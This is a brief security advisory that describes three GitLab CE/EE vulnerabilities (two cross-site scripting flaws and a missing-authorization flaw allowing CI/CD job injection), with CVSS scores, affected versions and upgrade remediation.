Severity
Medium
Analysis Summary
CVE-2025-4278 CVSS:8.7
An HTML injection/XSS vulnerability in GitLab CE/EE. Under certain conditions, malicious HTML can be injected into the search page, potentially hijacking user accounts.
CVE-2025-2254 CVSS:8.7
Cross‑Site Scripting (XSS) vulnerability in GitLab CE/EE’s snippet viewer. Due to improper output encoding when rendering snippets, a malicious user can inject HTML or JavaScript that executes in the browser of any user who views the snippet.
CVE-2025-5121 CVSS:8.5
High-severity missing authorization vulnerability in GitLab Ultimate Enterprise Edition (EE). It enables an authenticated but unauthorized user to inject malicious CI/CD jobs into the project pipelines of all projects on an Ultimate‑licensed GitLab instance.
Impact
- Cross-site Scripting
- Gain Access
Indicators of Compromise
CVE
CVE-2025-4278
CVE-2025-2254
CVE-2025-5121
Affected Vendors
- GitLab
Affected Products
- GitLab CE/EE releases from 18.0 up to (but excluding) 18.0.2
- GitLab CE/EE versions 17.9 up to—but not including—17.10.8
- GitLab CE/EE versions 17.11 up to—but not including—17.11.4
- GitLab CE/EE versions 18.0 up to—but not including—18.0.2
- GitLab Ultimate EE versions: from 17.11 up to but excluding 17.11.4
- GitLab Ultimate EE versions: from 18.0 up to but excluding 18.0.2
Remediation
Upgrade to the latest version of GitLab, available from the GitLab Website.